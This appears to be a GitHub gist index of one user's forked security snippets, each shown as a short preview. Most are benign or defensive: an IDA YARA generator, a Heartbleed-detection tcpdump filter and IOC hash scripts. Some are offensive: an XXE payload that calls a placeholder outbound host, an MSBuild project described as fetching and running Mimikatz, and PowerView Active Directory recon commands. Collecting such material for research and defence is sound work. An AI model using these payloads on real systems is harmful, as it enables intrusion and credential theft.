Skip to content

Instantly share code, notes, and snippets.

@schrodyn
schrodyn / gist:f027f973b71284322f9e870ffd8f1eb4
Created August 17, 2016 15:25 — forked from cdown/gist:1163649
Bash urlencode and urldecode
urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf "$c" ;;
@schrodyn
schrodyn / yara_fn.py
Created August 19, 2016 06:20 — forked from williballenthin/yara_fn.py
generate a yara rule that matches the basic blocks of the current function in IDA Pro
'''
IDAPython script that generates a YARA rule to match against the
basic blocks of the current function. It masks out relocation bytes
and ignores jump instructions (given that we're already trying to
match compiler-specific bytes, this is of arguable benefit).
If python-yara is installed, the IDAPython script also validates that
the generated rule matches at least one segment in the current file.
author: Willi Ballenthin <[email protected]>
@schrodyn
schrodyn / XXE_payloads
Created August 30, 2016 15:52 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@schrodyn
schrodyn / scrdec18-VC8.exe
Created September 13, 2016 17:19 — forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
@schrodyn
schrodyn / katz.xml
Created October 9, 2016 23:12
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@schrodyn
schrodyn / PowerView-2.0-tricks.ps1
Created October 9, 2016 23:35 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.
@schrodyn
schrodyn / gist:3aec990f926082614a4b51d7d39e5085
Created November 9, 2016 13:27 — forked from crisroura/gist:10473454
Live detection of client heartbleed attack with tcpdump
Slight modification of tcpdump filter expression included in heartbleed.py script by Riverbed [1][2] to detect live client side heartbleed attacks.
Modified the original filter to detect traffic to a specific client host from any port. Also modified lengths check to 68. For more information about this tcpdump filter take a look at Riverbed blog post [2].
Detection tested with https://reverseheartbleed.com
tcpdump -i <INTERFACE> "((not ether proto 0x8100) and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68)))) or (vlan and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68))))"
Example to detect client heartbleed att
@schrodyn
schrodyn / EquationDrug-IOC-list.txt
Created January 14, 2017 15:45 — forked from msuiche/EquationDrug-IOC-list.txt
List of EquationDrug IOCs #ShadowBrokers
PS E:\ioc> dir . | Foreach-Object{
>> $file = $_
>> $hash = Get-FileHash $file -Algorithm MD5
>> $fileinfo = Get-Item $file
>>
>> New-Object -TypeName PSObject -Property @{
>> LastWriteTime = $fileinfo.LastWriteTime
>> Length = $fileinfo.Length
>> Algorithm = $hash.Algorithm
>> MD5 = $hash.Hash
@schrodyn
schrodyn / ioc-generator.ps1
Created January 14, 2017 15:45 — forked from msuiche/ioc-generator.ps1
PowerShell IOCs generator
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm